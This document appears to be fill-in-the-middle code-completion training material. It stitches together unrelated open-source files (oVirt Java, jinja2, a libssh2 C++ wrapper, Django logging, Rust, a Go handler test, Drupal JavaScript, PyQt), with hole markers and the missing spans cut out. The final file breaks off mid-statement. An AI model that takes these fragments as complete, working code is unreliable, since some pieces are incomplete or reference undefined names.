import org.ovirt.engine.core.vdsbroker.ResourceManager;
/**
 * We need to detect whether vdsm supports jsonrpc or only xmlrpc. It is confusing to users
 * when they have a 3.5+ cluster and connect to a vdsm <3.5 host, which supports only xmlrpc.
 * In order to present version information in such a situation we need to fall back to xmlrpc.
*
*/
public class ProtocolDetector {
private Integer connectionTimeout = null;
private Integer retryAttempts = null;
private VDS vds;
public ProtocolDetector(VDS vds) {
this.vds = vds;
this.retryAttempts = Config.<Integer> getValue(ConfigValues.ProtocolFallbackRetries);
this.connectionTimeout = Config.<Integer> getValue(ConfigValues.ProtocolFallbackTimeoutInMilliSeconds);
}
/**
* Attempts to connect to vdsm using a proxy from {@code VdsManager} for a host.
* There are 3 attempts to connect.
*
* @return <code>true</code> if connected or <code>false</code> if connection failed.
*/
public boolean attemptConnection() {
boolean connected = false;
try {
for (int i = 0; i < this.retryAttempts; i++) {
long timeout = Config.<Integer> getValue(ConfigValues.SetupNetworksPollingTimeout);
FutureVDSCall<VDSReturnValue> task =
Backend.getInstance().getResourceManager().runFutureVdsCommand(FutureVDSCommandType.TimeBoundPoll,
new TimeBoundPollVDSCommandParameters(vds.getId(), timeout, TimeUnit.SECONDS));
VDSReturnValue returnValue =
task.get(timeout, TimeUnit.SECONDS);
connected = returnValue.getSucceeded();
if (connected) {
break;
}
Thread.sleep(this.connectionTimeout);
}
} catch (TimeoutException | InterruptedException ignored) {<|fim▁hole|> }
return connected;
}
/**
* Stops {@code VdsManager} for a host.
*/
public void stopConnection() {
ResourceManager.getInstance().RemoveVds(this.vds.getId());
}
/**
* Fall back the protocol and attempts the connection {@link ProtocolDetector#attemptConnection()}.
*
* @return <code>true</code> if connected or <code>false</code> if connection failed.
*/
public boolean attemptFallbackProtocol() {
vds.setProtocol(VdsProtocol.XML);
ResourceManager.getInstance().AddVds(vds, false);
return attemptConnection();
}
/**
* Updates DB with fall back protocol (xmlrpc).
*/
public void setFallbackProtocol() {
final VdsStatic vdsStatic = this.vds.getStaticData();
vdsStatic.setProtocol(VdsProtocol.XML);
TransactionSupport.executeInNewTransaction(new TransactionMethod<Void>() {
@Override
public Void runInTransaction() {
DbFacade.getInstance().getVdsStaticDao().update(vdsStatic);
return null;
}
});
}
}<|fim▁end|> | |
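# The detector above is a bounded retry loop with a protocol switch at the
# end. The same control flow in Python (attempt/fall_back are placeholder
# callables, not the engine's real API):
import time

def connect_with_fallback(attempt, fall_back, retries=3, delay=1.0):
    for _ in range(retries):
        if attempt():          # e.g. a time-bound poll over the preferred protocol
            return True
        time.sleep(delay)
    return fall_back()         # e.g. re-register the host and poll over xmlrpc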
<|file_name|>__init__.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*-
"""
jinja2
~~~~~~<|fim▁hole|>
Jinja2 is a template engine written in pure Python. It provides a
Django inspired non-XML syntax but supports inline expressions and
an optional sandboxed environment.
Nutshell
--------
Here a small example of a Jinja2 template::
{% extends 'base.html' %}
{% block title %}Memberlist{% endblock %}
{% block content %}
<ul>
{% for user in users %}
<li><a href="{{ user.url }}">{{ user.username }}</a></li>
{% endfor %}
</ul>
{% endblock %}
:copyright: (c) 2010 by the Jinja Team.
:license: BSD, see LICENSE for more details.
"""
__docformat__ = 'restructuredtext en'
__version__ = '2.7.1'
# high level interface
from jinja2.environment import Environment, Template
# loaders
from jinja2.loaders import BaseLoader, FileSystemLoader, PackageLoader, \
DictLoader, FunctionLoader, PrefixLoader, ChoiceLoader, \
ModuleLoader
# bytecode caches
from jinja2.bccache import BytecodeCache, FileSystemBytecodeCache, \
MemcachedBytecodeCache
# undefined types
from jinja2.runtime import Undefined, DebugUndefined, StrictUndefined
# exceptions
from jinja2.exceptions import TemplateError, UndefinedError, \
TemplateNotFound, TemplatesNotFound, TemplateSyntaxError, \
TemplateAssertionError
# decorators and public utilities
from jinja2.filters import environmentfilter, contextfilter, \
evalcontextfilter
from jinja2.utils import Markup, escape, clear_caches, \
environmentfunction, evalcontextfunction, contextfunction, \
is_undefined
__all__ = [
'Environment', 'Template', 'BaseLoader', 'FileSystemLoader',
'PackageLoader', 'DictLoader', 'FunctionLoader', 'PrefixLoader',
'ChoiceLoader', 'BytecodeCache', 'FileSystemBytecodeCache',
'MemcachedBytecodeCache', 'Undefined', 'DebugUndefined',
'StrictUndefined', 'TemplateError', 'UndefinedError', 'TemplateNotFound',
'TemplatesNotFound', 'TemplateSyntaxError', 'TemplateAssertionError',
'ModuleLoader', 'environmentfilter', 'contextfilter', 'Markup', 'escape',
'environmentfunction', 'contextfunction', 'clear_caches', 'is_undefined',
'evalcontextfilter', 'evalcontextfunction'
]<|fim▁end|> | |
<|file_name|>host_key.hpp<|end_file_name|><|fim▁begin|>/**
@file
Host-key wrapper.
@if license
Copyright (C) 2010, 2013 Alexander Lamaison <[email protected]>
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License along
with this program; if not, write to the Free Software Foundation, Inc.,
51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
In addition, as a special exception, the the copyright holders give you
permission to combine this program with free software programs or the
OpenSSL project's "OpenSSL" library (or with modified versions of it,
with unchanged license). You may copy and distribute such a system
following the terms of the GNU GPL for this program and the licenses
of the other code concerned. The GNU General Public License gives
permission to release a modified version without this exception; this
exception also makes it possible to release a modified version which
carries forward this exception.
@endif
*/
#ifndef SSH_HOST_KEY_HPP
#define SSH_HOST_KEY_HPP
#include <ssh/detail/session_state.hpp>
#include <boost/foreach.hpp> // BOOST_FOREACH
#include <boost/shared_ptr.hpp> // shared_ptr
#include <boost/throw_exception.hpp> // BOOST_THROW_EXCEPTION
#include <sstream> // ostringstream
#include <stdexcept> // invalid_argument
#include <string>
#include <utility> // pair
#include <vector>
#include <libssh2.h>
namespace ssh
{
namespace detail
{
/**
* Thin wrapper around libssh2_session_hostkey.
*/
inline std::pair<std::string, int> hostkey(session_state& session)
{
// Session owns the string.
// Lock until we finish copying the key string from the session. I
// don't know if other calls to the session are currently able to
// change it, but they might one day.
// Locking it for the duration makes it thread-safe either way.
detail::session_state::scoped_lock lock = session.aquire_lock();
size_t len = 0;
int type = LIBSSH2_HOSTKEY_TYPE_UNKNOWN;
const char* key =
libssh2_session_hostkey(session.session_ptr(), &len, &type);
if (key)
return std::make_pair(std::string(key, len), type);
else
return std::make_pair(std::string(), type);
}
/**
* Thin wrapper around libssh2_hostkey_hash.
*
* @param T Type of collection to return. Sensible examples
* include std::string or std::vector<unsigned char>.
* @param session libssh2 session pointer
* @param hash_type Hash method being requested.
*/
template <typename T>
inline T hostkey_hash(session_state& session, int hash_type)
{
// Session owns the data.
// Lock until we finish copying the key hash bytes from the session. I
// don't know if other calls to the session are currently able to
// change it, but they might one day.
// Locking it for the duration makes it thread-safe either way.
detail::session_state::scoped_lock lock = session.aquire_lock();
const T::value_type* hash_bytes = reinterpret_cast<const T::value_type*>(
::libssh2_hostkey_hash(session.session_ptr(), hash_type));
size_t len = 0;
if (hash_type == LIBSSH2_HOSTKEY_HASH_MD5)
len = 16;
else if (hash_type == LIBSSH2_HOSTKEY_HASH_SHA1)
len = 20;
else
BOOST_THROW_EXCEPTION(std::invalid_argument("Unknown hash type"));
if (hash_bytes)
return T(hash_bytes, hash_bytes + len);
else
return T();
}
/**
* Thin wrapper around libssh2_session_methods.
*/
inline std::string method(session_state& session, int method_type)
{
// Session owns the string.
// Lock until we finish copying the string from the session. I
// don't know if other calls to the session are currently able to
// change it, but they might one day.
// Locking it for the duration makes it thread-safe either way.
detail::session_state::scoped_lock lock = session.aquire_lock();
const char* key_type =
libssh2_session_methods(session.session_ptr(), method_type);
if (key_type)
return std::string(key_type);
else
return std::string();
}
}
/**
* Possible types of host-key algorithm.
*/
struct hostkey_type
{
enum enum_t
{
unknown,
rsa1,
ssh_rsa,
ssh_dss
};
};
namespace detail
{
/**
* Convert the returned key-type from libssh2_session_hostkey into a value from
* the hostkey_type enum.
*/
inline hostkey_type::enum_t type_to_hostkey_type(int type)
{
switch (type)
{
case LIBSSH2_HOSTKEY_TYPE_RSA:
return hostkey_type::ssh_rsa;
case LIBSSH2_HOSTKEY_TYPE_DSS:
return hostkey_type::ssh_dss;
default:
return hostkey_type::unknown;
}
}
}
/**
* Class representing the session's current negotiated host-key.
*
* As well as the raw key itself, this class provides MD5 and SHA1 hashes and
* key metadata.
*/
class host_key
{
public:
explicit host_key(detail::session_state& session)
: // We pull everything out of the session here and store it to avoid
// instances of this class depending on the lifetime of the session
m_key(detail::hostkey(session)),
m_algorithm_name(detail::method(session, LIBSSH2_METHOD_HOSTKEY)),
m_md5_hash(detail::hostkey_hash<std::vector<unsigned char>>(
session, LIBSSH2_HOSTKEY_HASH_MD5)),
m_sha1_hash(detail::hostkey_hash<std::vector<unsigned char>>(
session, LIBSSH2_HOSTKEY_HASH_SHA1))
{
}
/**
* Host-key either raw or base-64 encoded.
*
* @see is_base64()
*/
std::string key() const
{
return m_key.first;
}
/**
* Is the key returned by key() base64-encoded (printable)?
*/
bool is_base64() const
{
return false;
}
/**
* Type of the key algorithm e.g., ssh-dss.
*/
hostkey_type::enum_t algorithm() const
{
return detail::type_to_hostkey_type(m_key.second);
}
/**
* Printable name of the method negotiated for the key algorithm.
*/
std::string algorithm_name() const
{<|fim▁hole|> return m_algorithm_name;
}
/**
* Hostkey sent by the server to identify itself, hashed with the MD5
* algorithm.
*
* @returns Hash as binary data; it is not directly printable
* (@see hexify()).
*/
std::vector<unsigned char> md5_hash() const
{
return m_md5_hash;
}
/**
* Hostkey sent by the server to identify itself, hashed with the SHA1
* algorithm.
*
* @returns Hash as binary data; it is not directly printable
* (@see hexify()).
*/
std::vector<unsigned char> sha1_hash() const
{
return m_sha1_hash;
}
private:
std::pair<std::string, int> m_key;
std::string m_algorithm_name;
std::vector<unsigned char> m_md5_hash;
std::vector<unsigned char> m_sha1_hash;
};
/**
 * Turn a collection of bytes into a printable hexadecimal string.
 *
 * @param bytes       Collection of bytes.
 * @param nibble_sep  String to place between each pair of hexadecimal
 *                    characters.
 * @param uppercase   Whether to use uppercase or lowercase hexadecimal.
*/
template <typename T>
std::string hexify(const T& bytes, const std::string& nibble_sep = ":",
bool uppercase = false)
{
std::ostringstream hex_hash;
if (uppercase)
hex_hash << std::uppercase;
else
hex_hash << std::nouppercase;
hex_hash << std::hex << std::setfill('0');
BOOST_FOREACH (unsigned char b, bytes)
{
if (!hex_hash.str().empty())
hex_hash << nibble_sep;
unsigned int i = b;
hex_hash << std::setw(2) << i;
}
return hex_hash.str();
}
} // namespace ssh
#endif<|fim▁end|> | |
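# ssh::hexify above is byte-to-hex formatting with a configurable separator
# and case. For comparison, the same transform in Python 3 (illustrative
# only; the header keeps its C++ template):
def hexify(data, sep=":", uppercase=False):
    fmt = "{:02X}" if uppercase else "{:02x}"
    return sep.join(fmt.format(b) for b in data)

# hexify(b"\x9f\x10\xab") -> "9f:10:ab", the usual fingerprint layout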
<|file_name|>logger.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*-
import logging, logging.handlers
from django.conf import settings
def get_logger(name, level=logging.INFO, format='[%(asctime)s] %(message)s', handler=None, filename=None):
new_logger = logging.getLogger(name)
new_logger.setLevel(level)
<|fim▁hole|> filename = filename or '%s/logs/%s.log' % (settings.HOME_DIR, name)
handler = logging.FileHandler(filename)
handler.setFormatter(logging.Formatter(format))
new_logger.addHandler(handler)
return new_logger
if hasattr(settings, 'LOG_FILENAME') and not logger:
handler = logging.handlers.TimedRotatingFileHandler(settings.LOG_FILENAME, when = 'midnight')
logger = get_logger('default', handler=handler)<|fim▁end|> | if not handler: |
<|file_name|>io.rs<|end_file_name|><|fim▁begin|>// Copyright 2012-2014 The Rust Project Developers. See the COPYRIGHT
// file at the top-level directory of this distribution and at
// http://rust-lang.org/COPYRIGHT.
//
// Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or
// http://www.apache.org/licenses/LICENSE-2.0> or the MIT license
// <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your
// option. This file may not be copied, modified, or distributed
// except according to those terms.
use std::old_io::{IoError, IoResult, SeekStyle};
use std::old_io;
use std::slice;
use std::iter::repeat;
static BUF_CAPACITY: uint = 128;
fn combine(seek: SeekStyle, cur: uint, end: uint, offset: i64) -> IoResult<u64> {
// compute offset as signed and clamp to prevent overflow
let pos = match seek {
old_io::SeekSet => 0,
old_io::SeekEnd => end,
old_io::SeekCur => cur,
} as i64;
if offset + pos < 0 {
Err(IoError {
kind: old_io::InvalidInput,
desc: "invalid seek to a negative offset",
detail: None
})
} else {
Ok((offset + pos) as u64)
}
}
/// Writes to an owned, growable byte vector that supports seeking.
///
/// # Example
///
/// ```rust
/// # #![allow(unused_must_use)]
/// use rbml::io::SeekableMemWriter;
///
/// let mut w = SeekableMemWriter::new();
/// w.write(&[0, 1, 2]);
///
/// assert_eq!(w.unwrap(), vec!(0, 1, 2));
/// ```
pub struct SeekableMemWriter {
buf: Vec<u8>,
pos: uint,
}
impl SeekableMemWriter {
/// Create a new `SeekableMemWriter`.
#[inline]
pub fn new() -> SeekableMemWriter {
SeekableMemWriter::with_capacity(BUF_CAPACITY)
}
/// Create a new `SeekableMemWriter`, allocating at least `n` bytes for
/// the internal buffer.
#[inline]
pub fn with_capacity(n: uint) -> SeekableMemWriter {
SeekableMemWriter { buf: Vec::with_capacity(n), pos: 0 }
}
/// Acquires an immutable reference to the underlying buffer of this
/// `SeekableMemWriter`.
///
/// No method is exposed for acquiring a mutable reference to the buffer
    /// because it could corrupt the state of this `SeekableMemWriter`.
#[inline]
pub fn get_ref<'a>(&'a self) -> &'a [u8] { &self.buf }
<|fim▁hole|> /// Unwraps this `SeekableMemWriter`, returning the underlying buffer
#[inline]
pub fn unwrap(self) -> Vec<u8> { self.buf }
}
impl Writer for SeekableMemWriter {
#[inline]
fn write_all(&mut self, buf: &[u8]) -> IoResult<()> {
if self.pos == self.buf.len() {
self.buf.push_all(buf)
} else {
// Make sure the internal buffer is as least as big as where we
// currently are
let difference = self.pos as i64 - self.buf.len() as i64;
if difference > 0 {
self.buf.extend(repeat(0).take(difference as uint));
}
// Figure out what bytes will be used to overwrite what's currently
// there (left), and what will be appended on the end (right)
let cap = self.buf.len() - self.pos;
let (left, right) = if cap <= buf.len() {
(&buf[..cap], &buf[cap..])
} else {
let result: (_, &[_]) = (buf, &[]);
result
};
// Do the necessary writes
if left.len() > 0 {
slice::bytes::copy_memory(&mut self.buf[self.pos..], left);
}
if right.len() > 0 {
self.buf.push_all(right);
}
}
// Bump us forward
self.pos += buf.len();
Ok(())
}
}
impl Seek for SeekableMemWriter {
#[inline]
fn tell(&self) -> IoResult<u64> { Ok(self.pos as u64) }
#[inline]
fn seek(&mut self, pos: i64, style: SeekStyle) -> IoResult<()> {
let new = try!(combine(style, self.pos, self.buf.len(), pos));
self.pos = new as uint;
Ok(())
}
}
#[cfg(test)]
mod tests {
extern crate test;
use super::SeekableMemWriter;
use std::old_io;
use std::iter::repeat;
use test::Bencher;
#[test]
fn test_seekable_mem_writer() {
let mut writer = SeekableMemWriter::new();
assert_eq!(writer.tell(), Ok(0));
writer.write(&[0]).unwrap();
assert_eq!(writer.tell(), Ok(1));
writer.write(&[1, 2, 3]).unwrap();
writer.write(&[4, 5, 6, 7]).unwrap();
assert_eq!(writer.tell(), Ok(8));
let b: &[_] = &[0, 1, 2, 3, 4, 5, 6, 7];
assert_eq!(writer.get_ref(), b);
writer.seek(0, old_io::SeekSet).unwrap();
assert_eq!(writer.tell(), Ok(0));
writer.write(&[3, 4]).unwrap();
let b: &[_] = &[3, 4, 2, 3, 4, 5, 6, 7];
assert_eq!(writer.get_ref(), b);
writer.seek(1, old_io::SeekCur).unwrap();
writer.write(&[0, 1]).unwrap();
let b: &[_] = &[3, 4, 2, 0, 1, 5, 6, 7];
assert_eq!(writer.get_ref(), b);
writer.seek(-1, old_io::SeekEnd).unwrap();
writer.write(&[1, 2]).unwrap();
let b: &[_] = &[3, 4, 2, 0, 1, 5, 6, 1, 2];
assert_eq!(writer.get_ref(), b);
writer.seek(1, old_io::SeekEnd).unwrap();
writer.write(&[1]).unwrap();
let b: &[_] = &[3, 4, 2, 0, 1, 5, 6, 1, 2, 0, 1];
assert_eq!(writer.get_ref(), b);
}
#[test]
fn seek_past_end() {
let mut r = SeekableMemWriter::new();
r.seek(10, old_io::SeekSet).unwrap();
assert!(r.write(&[3]).is_ok());
}
#[test]
fn seek_before_0() {
let mut r = SeekableMemWriter::new();
assert!(r.seek(-1, old_io::SeekSet).is_err());
}
fn do_bench_seekable_mem_writer(b: &mut Bencher, times: uint, len: uint) {
let src: Vec<u8> = repeat(5).take(len).collect();
b.bytes = (times * len) as u64;
b.iter(|| {
let mut wr = SeekableMemWriter::new();
for _ in 0..times {
wr.write(&src).unwrap();
}
let v = wr.unwrap();
assert_eq!(v.len(), times * len);
assert!(v.iter().all(|x| *x == 5));
});
}
#[bench]
fn bench_seekable_mem_writer_001_0000(b: &mut Bencher) {
do_bench_seekable_mem_writer(b, 1, 0)
}
#[bench]
fn bench_seekable_mem_writer_001_0010(b: &mut Bencher) {
do_bench_seekable_mem_writer(b, 1, 10)
}
#[bench]
fn bench_seekable_mem_writer_001_0100(b: &mut Bencher) {
do_bench_seekable_mem_writer(b, 1, 100)
}
#[bench]
fn bench_seekable_mem_writer_001_1000(b: &mut Bencher) {
do_bench_seekable_mem_writer(b, 1, 1000)
}
#[bench]
fn bench_seekable_mem_writer_100_0000(b: &mut Bencher) {
do_bench_seekable_mem_writer(b, 100, 0)
}
#[bench]
fn bench_seekable_mem_writer_100_0010(b: &mut Bencher) {
do_bench_seekable_mem_writer(b, 100, 10)
}
#[bench]
fn bench_seekable_mem_writer_100_0100(b: &mut Bencher) {
do_bench_seekable_mem_writer(b, 100, 100)
}
#[bench]
fn bench_seekable_mem_writer_100_1000(b: &mut Bencher) {
do_bench_seekable_mem_writer(b, 100, 1000)
}
}<|fim▁end|> | |
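# The write path of the Rust buffer above has three steps: zero-fill any gap
# up to the cursor, overwrite the bytes that fit, and append the rest. A
# compact Python sketch of the same state machine (a sketch, not the port):
class SeekableBuffer:
    def __init__(self):
        self.buf = bytearray()
        self.pos = 0

    def write(self, data):
        if self.pos > len(self.buf):
            self.buf.extend(b"\0" * (self.pos - len(self.buf)))  # pad the gap
        cap = len(self.buf) - self.pos
        left, right = data[:cap], data[cap:]   # overwrite part / append part
        self.buf[self.pos:self.pos + len(left)] = left
        self.buf.extend(right)
        self.pos += len(data)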
<|file_name|>datatypes.rs<|end_file_name|><|fim▁begin|>use serde_json;
use std::io;
use std::string::FromUtf8Error;
#[derive(Deserialize, Debug)]
pub struct Event {
pub version: String,
pub event: String,
pub data: DownloadComplete
}
#[derive(Deserialize, Debug)]
pub struct DownloadComplete {
pub update_id: String,
pub update_image: String,
pub signature: String
}
#[derive(Debug)]
pub enum Error {
Custom(String),
Io(io::Error),
Json(serde_json::Error),
Utf8(FromUtf8Error)
}
impl From<io::Error> for Error {
fn from(err: io::Error) -> Error {
Error::Io(err)
}
}
impl From<FromUtf8Error> for Error {
fn from(err: FromUtf8Error) -> Error {
Error::Utf8(err)<|fim▁hole|>
impl From<serde_json::Error> for Error {
fn from(err: serde_json::Error) -> Error {
Error::Json(err)
}
}<|fim▁end|> | }
} |
<|file_name|>_collapse.js<|end_file_name|><|fim▁begin|>(function ($) {
/**
* Toggle the visibility of a fieldset using smooth animations.
*/
Drupal.toggleFieldset = function (fieldset) {
var $toggle = $($(fieldset).find('[data-toggle=collapse]').data('target'));
if ($toggle.length) {
$toggle.collapse('toggle');
}
};
/**
* Scroll a given fieldset into view as much as possible.
*/
Drupal.collapseScrollIntoView = function (node) {<|fim▁hole|> var offset = document.documentElement.scrollTop || document.body.scrollTop || 0;
var posY = $(node).offset().top;
var fudge = 55;
if (posY + node.offsetHeight + fudge > h + offset) {
if (node.offsetHeight > h) {
window.scrollTo(0, posY);
}
else {
window.scrollTo(0, posY + node.offsetHeight - h + fudge);
}
}
};
Drupal.behaviors.collapse = {
attach: function (context, settings) {
$('fieldset.collapsible', context).once('collapse', function () {
var $fieldset = $(this);
// Expand fieldset if there are errors inside, or if it contains an
// element that is targeted by the URI fragment identifier.
var anchor = location.hash && location.hash != '#' ? ', ' + location.hash : '';
if ($fieldset.find('.error' + anchor).length) {
$fieldset.removeClass('collapsed');
}
var summary = $('<span class="summary"></span>');
$fieldset.
bind('summaryUpdated', function () {
var text = $.trim($fieldset.drupalGetSummary());
summary.html(text ? ' (' + text + ')' : '');
})
.trigger('summaryUpdated');
// Turn the legend into a clickable link, but retain span.fieldset-legend
// for CSS positioning.
var $legend = $('> legend .fieldset-legend', this);
$('<span class="fieldset-legend-prefix element-invisible"></span>')
.append($fieldset.hasClass('collapsed') ? Drupal.t('Show') : Drupal.t('Hide'))
.prependTo($legend);
$fieldset.find('[data-toggle=collapse]').on('click', function (e) {
e.preventDefault();
});
// Bind Bootstrap events with Drupal core events.
$fieldset
.append(summary)
.on('show.bs.collapse', function () {
$fieldset
.removeClass('collapsed')
.find('> legend span.fieldset-legend-prefix').html(Drupal.t('Hide'));
})
.on('shown.bs.collapse', function () {
$fieldset.trigger({ type: 'collapsed', value: false });
Drupal.collapseScrollIntoView($fieldset.get(0));
})
.on('hide.bs.collapse', function () {
$fieldset
.addClass('collapsed')
.find('> legend span.fieldset-legend-prefix').html(Drupal.t('Show'));
})
.on('hidden.bs.collapse', function () {
$fieldset.trigger({ type: 'collapsed', value: true });
});
});
}
};
})(jQuery);<|fim▁end|> | var h = document.documentElement.clientHeight || document.body.clientHeight || 0; |
<|file_name|>handler_test.go<|end_file_name|><|fim▁begin|>package provisioner
import (
"bytes"
"context"
"encoding/json"
"net/http"
"net/http/httptest"
"testing"
"github.com/gorilla/mux"
"github.com/pborman/uuid"
"github.com/pkg/errors"
"github.com/stretchr/testify/mock"
"github.com/supergiant/control/pkg/account"
"github.com/supergiant/control/pkg/clouds"
"github.com/supergiant/control/pkg/model"
"github.com/supergiant/control/pkg/profile"
"github.com/supergiant/control/pkg/sgerrors"
"github.com/supergiant/control/pkg/workflows"
"github.com/supergiant/control/pkg/workflows/steps"
)
type mockProvisioner struct {<|fim▁hole|>}
func (m *mockProvisioner) ProvisionCluster(ctx context.Context, kubeProfile *profile.Profile, config *steps.Config) (map[string][]*workflows.Task, error) {
return m.provisionCluster(ctx, kubeProfile, config)
}
func (m *mockProvisioner) ProvisionNode(ctx context.Context, nodeProfile profile.NodeProfile, kube *model.Kube, config *steps.Config) (*workflows.Task, error) {
return m.provisionNode(ctx, nodeProfile, kube, config)
}
type mockAccountGetter struct {
get func(context.Context, string) (*model.CloudAccount, error)
}
func (m *mockAccountGetter) Get(ctx context.Context, id string) (*model.CloudAccount, error) {
return m.get(ctx, id)
}
type mockKubeGetter struct {
get func(context.Context, string) (*model.Kube, error)
}
func (m *mockKubeGetter) Get(ctx context.Context, name string) (*model.Kube, error) {
return m.get(ctx, name)
}
type mockProfileCreator struct {
mock.Mock
}
func (m *mockProfileCreator) Create(ctx context.Context, p *profile.Profile) error {
args := m.Called(ctx, p)
return args.Error(0)
}
func TestProvisionBadClusterName(t *testing.T) {
testCases := []string{"non_Valid`", "_@badClusterName"}
for _, clusterName := range testCases {
provisionRequest := ProvisionRequest{
ClusterName: clusterName,
}
bodyBytes, _ := json.Marshal(&provisionRequest)
req, _ := http.NewRequest(http.MethodPost, "/", bytes.NewBuffer(bodyBytes))
rec := httptest.NewRecorder()
handler := Handler{}
handler.Provision(rec, req)
if rec.Code != http.StatusBadRequest {
t.Errorf("Wrong status code expected %d actual %d", http.StatusBadRequest, rec.Code)
return
}
}
}
func TestProvisionHandler(t *testing.T) {
p := &ProvisionRequest{
"test",
profile.Profile{},
"1234",
}
validBody, _ := json.Marshal(p)
testCases := []struct {
description string
expectedCode int
body []byte
getProfile func(context.Context, string) (*profile.Profile, error)
kubeGetter func(context.Context, string) (*model.Kube, error)
getAccount func(context.Context, string) (*model.CloudAccount, error)
provision func(context.Context, *profile.Profile, *steps.Config) (map[string][]*workflows.Task, error)
}{
{
description: "malformed request body",
body: []byte(`{`),
expectedCode: http.StatusBadRequest,
},
{
description: "account not found",
body: validBody,
expectedCode: http.StatusBadRequest,
getAccount: func(context.Context, string) (*model.CloudAccount, error) {
return nil, sgerrors.ErrNotFound
},
kubeGetter: func(context.Context, string) (*model.Kube, error) {
return nil, nil
},
},
{
description: "wrong cloud provider name",
body: validBody,
expectedCode: http.StatusNotFound,
getAccount: func(context.Context, string) (*model.CloudAccount, error) {
return &model.CloudAccount{}, nil
},
kubeGetter: func(context.Context, string) (*model.Kube, error) {
return nil, nil
},
},
{
description: "invalid credentials when provisionCluster",
body: validBody,
expectedCode: http.StatusInternalServerError,
getAccount: func(context.Context, string) (*model.CloudAccount, error) {
return &model.CloudAccount{
Provider: clouds.DigitalOcean,
}, nil
},
kubeGetter: func(context.Context, string) (*model.Kube, error) {
return nil, nil
},
provision: func(context.Context, *profile.Profile, *steps.Config) (map[string][]*workflows.Task, error) {
return nil, sgerrors.ErrInvalidCredentials
},
},
{
body: validBody,
expectedCode: http.StatusAccepted,
getAccount: func(context.Context, string) (*model.CloudAccount, error) {
return &model.CloudAccount{
Provider: clouds.DigitalOcean,
}, nil
},
kubeGetter: func(context.Context, string) (*model.Kube, error) {
return nil, nil
},
provision: func(ctx context.Context, profile *profile.Profile, config *steps.Config) (map[string][]*workflows.Task, error) {
config.Kube.ID = uuid.New()
return map[string][]*workflows.Task{
"master": {
{
ID: "master-task-id-1",
},
},
"node": {
{
ID: "node-task-id-2",
},
},
"cluster": {
{},
},
}, nil
},
},
}
provisioner := &mockProvisioner{}
kubeGetter := &mockKubeGetter{}
accGetter := &mockAccountGetter{}
profileCreator := &mockProfileCreator{}
profileCreator.On("Create",
mock.Anything, mock.Anything).Return(nil)
for _, testCase := range testCases {
provisioner.provisionCluster = testCase.provision
accGetter.get = testCase.getAccount
kubeGetter.get = testCase.kubeGetter
req, _ := http.NewRequest(http.MethodPost, "/", bytes.NewBuffer(testCase.body))
rec := httptest.NewRecorder()
handler := Handler{
kubeGetter: kubeGetter,
provisioner: provisioner,
accountGetter: accGetter,
profileService: profileCreator,
}
handler.Provision(rec, req)
if rec.Code != testCase.expectedCode {
t.Errorf("Wrong status code expected %d actual %d", testCase.expectedCode, rec.Code)
return
}
if testCase.expectedCode == http.StatusAccepted {
resp := ProvisionResponse{}
err := json.NewDecoder(rec.Body).Decode(&resp)
if err != nil {
t.Errorf("Unepxpected error while decoding response %v", err)
}
if len(resp.ClusterID) == 0 {
t.Errorf("ClusterID must not be empty")
}
}
}
}
func TestNewHandler(t *testing.T) {
accSvc := &account.Service{}
kubeSvc := &mockKubeService{}
p := &TaskProvisioner{}
h := NewHandler(kubeSvc, accSvc, nil, p)
if h.accountGetter == nil {
t.Errorf("account getter must not be nil")
}
if h.provisioner != p {
t.Errorf("expected provisioner %v actual %v", p, h.provisioner)
}
}
func TestHandler_Register(t *testing.T) {
h := Handler{}
r := mux.NewRouter()
h.Register(r)
expectedRouteCount := 1
actualRouteCount := 0
err := r.Walk(func(route *mux.Route, router *mux.Router, ancestors []*mux.Route) error {
if router != r {
return errors.New("wrong router")
}
actualRouteCount += 1
return nil
})
if err != nil {
t.Errorf("Unexpected error from walk router %v", err)
}
if expectedRouteCount != actualRouteCount {
t.Errorf("Wrong route count expected %d actual %d", expectedRouteCount, actualRouteCount)
}
}<|fim▁end|> | provisionCluster func(context.Context, *profile.Profile, *steps.Config) (map[string][]*workflows.Task, error)
provisionNode func(context.Context, profile.NodeProfile, *model.Kube, *steps.Config) (*workflows.Task, error) |
<|file_name|>simple_point_picker.py<|end_file_name|><|fim▁begin|># The MIT License (MIT)
#
# Copyright (c) 2016 WUSTL ZPLAB
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
# Authors: Erik Hvatum <[email protected]>
from PyQt5 import Qt
from ..shared_resources import UNIQUE_QGRAPHICSITEM_TYPE
class PointItem(Qt.QGraphicsRectItem):
# Omitting .type() or failing to return a unique causes PyQt to return a wrapper of the wrong type when retrieving an instance of this item as a base
# class pointer from C++. For example, if this item has a child and that child calls self.parentItem(), it would receive a Python object of type
# Qt.QGraphicsRectItem rather than PointItem unless PointItem has a correct .type() implementation.
QGRAPHICSITEM_TYPE = UNIQUE_QGRAPHICSITEM_TYPE()
def __init__(self, picker, x, y, w, h, parent_item):
super().__init__(x, y, w, h, parent_item)
self.picker = picker
flags = self.flags()
self.setFlags(
flags |
